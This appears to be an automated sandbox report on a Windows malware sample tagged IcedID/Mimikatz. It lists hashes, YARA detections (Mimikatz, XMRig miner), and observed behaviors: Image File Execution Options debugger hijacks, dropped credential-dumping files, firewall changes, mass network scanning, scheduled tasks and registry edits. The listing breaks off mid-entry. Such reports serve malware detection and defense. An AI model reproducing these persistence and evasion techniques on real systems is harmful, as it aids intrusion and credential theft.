Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
04/06/2024, 18:04
Behavioral task
behavioral1
Sample
2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe
Resource
win7-20240215-en
General
-
Target
2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe
-
Size
7.9MB
-
MD5
751ab61e0808585777f684097dd5cf7d
-
SHA1
2f6dcf38242c7c8e85a296404d9ae96659237186
-
SHA256
c7c4daab07efb8a0ae9f9f50cd4ba1f5bc484332688bad2b23411a7a5e077953
-
SHA512
86f83e0e4e74e14276a0f09a8c14d5c8beda09cf80dd1504cac2860585bf1d5243c7ea483f9c3873b10273f78f9c9ee954b90c2cbd6329c2d2bb758054846ac1
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 856 created 1700 856 vkdejee.exe 37 -
Contacts a large (30345) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/2652-138-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 40 IoCs
resource yara_rule behavioral2/memory/4592-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4592-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0008000000023438-6.dat UPX behavioral2/memory/3884-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/2652-136-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp UPX behavioral2/files/0x0007000000023484-135.dat UPX behavioral2/memory/2652-138-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp UPX behavioral2/memory/2676-142-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/files/0x000700000002348f-141.dat UPX behavioral2/memory/2676-150-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/files/0x000700000002348c-164.dat UPX behavioral2/memory/5084-165-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/4592-171-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/852-175-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/1084-179-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-182-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/928-184-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/3884-188-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/1352-192-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-194-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/1796-197-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-200-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/2108-202-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/4960-206-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/448-210-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-212-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/4544-215-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/1976-219-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-222-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/4080-225-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/3880-229-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/544-232-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5016-234-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp UPX behavioral2/memory/5084-235-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-248-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-249-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-252-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-290-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-297-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX behavioral2/memory/5084-299-0x00007FF68C200000-0x00007FF68C320000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/5084-182-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-194-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-200-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-212-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-222-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-235-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-248-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-249-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-252-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-290-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-297-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig behavioral2/memory/5084-299-0x00007FF68C200000-0x00007FF68C320000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4592-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4592-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023438-6.dat mimikatz behavioral2/memory/3884-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2652-138-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts vkdejee.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts vkdejee.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2060 netsh.exe 1584 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe vkdejee.exe -
Executes dropped EXE 28 IoCs
pid Process 3884 vkdejee.exe 856 vkdejee.exe 1084 wpcap.exe 1880 pivnitiek.exe 2652 vfshost.exe 2676 ibibzztte.exe 1676 xohudmc.exe 5092 nslfoo.exe 5084 fpibei.exe 4592 ibibzztte.exe 852 ibibzztte.exe 1084 ibibzztte.exe 928 ibibzztte.exe 3884 ibibzztte.exe 1352 ibibzztte.exe 1796 ibibzztte.exe 2108 ibibzztte.exe 4960 ibibzztte.exe 448 ibibzztte.exe 4544 ibibzztte.exe 1976 ibibzztte.exe 4080 ibibzztte.exe 3880 ibibzztte.exe 544 ibibzztte.exe 5016 ibibzztte.exe 3588 vkdejee.exe 1688 fuinnkdmr.exe 5280 vkdejee.exe -
Loads dropped DLL 12 IoCs
pid Process 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1084 wpcap.exe 1880 pivnitiek.exe 1880 pivnitiek.exe 1880 pivnitiek.exe -
resource yara_rule behavioral2/memory/2652-136-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp upx behavioral2/files/0x0007000000023484-135.dat upx behavioral2/memory/2652-138-0x00007FF618E20000-0x00007FF618F0E000-memory.dmp upx behavioral2/memory/2676-142-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/files/0x000700000002348f-141.dat upx behavioral2/memory/2676-150-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/files/0x000700000002348c-164.dat upx behavioral2/memory/5084-165-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/4592-171-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/852-175-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/1084-179-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-182-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/928-184-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/3884-188-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/1352-192-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-194-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/1796-197-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-200-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/2108-202-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/4960-206-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/448-210-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-212-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/4544-215-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/1976-219-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-222-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/4080-225-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/3880-229-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/544-232-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5016-234-0x00007FF7E95E0000-0x00007FF7E963B000-memory.dmp upx behavioral2/memory/5084-235-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-248-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-249-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-252-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-290-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-297-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx behavioral2/memory/5084-299-0x00007FF68C200000-0x00007FF68C320000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 62 ifconfig.me 63 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E40FD8910F68839A32C4CF3F7FD8741B vkdejee.exe File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E40FD8910F68839A32C4CF3F7FD8741B vkdejee.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vkdejee.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\umubtmbps\UnattendGC\specials\tibe-2.dll vkdejee.exe File created C:\Windows\umubtmbps\Corporate\vfshost.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\cnli-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\coli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\posh-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.xml vkdejee.exe File created C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe vkdejee.exe File opened for modification C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libxml2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture32.dll vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimidrv.sys vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.exe vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Result.txt fuinnkdmr.exe File created C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ucl.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.exe vkdejee.exe File created C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\gibpmken\vkdejee.exe 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\UnattendGC\specials\exma-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\zlib1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\schoedcl.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\Shellcode.ini vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\scan.bat vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ssleay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\vimpcsvc.xml vkdejee.exe File created C:\Windows\ime\vkdejee.exe vkdejee.exe File opened for modification C:\Windows\umubtmbps\Corporate\log.txt cmd.exe File created C:\Windows\umubtmbps\bbrcgicuu\ip.txt vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\crli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trch-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tucl-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture64.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libeay32.dll vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimilib.dll vkdejee.exe File created C:\Windows\umubtmbps\upbdrjv\swrpwe.exe vkdejee.exe File opened for modification C:\Windows\gibpmken\vkdejee.exe 2024-06-04_751ab61e0808585777f684097dd5cf7d_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\xdvl-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trfo-2.dll vkdejee.exe File created C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3268 sc.exe 5096 sc.exe 5116 sc.exe 4252 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023438-6.dat nsis_installer_2 behavioral2/files/0x0007000000023448-14.dat nsis_installer_1 behavioral2/files/0x0007000000023448-14.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3648 schtasks.exe 4092 schtasks.exe 5056 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) 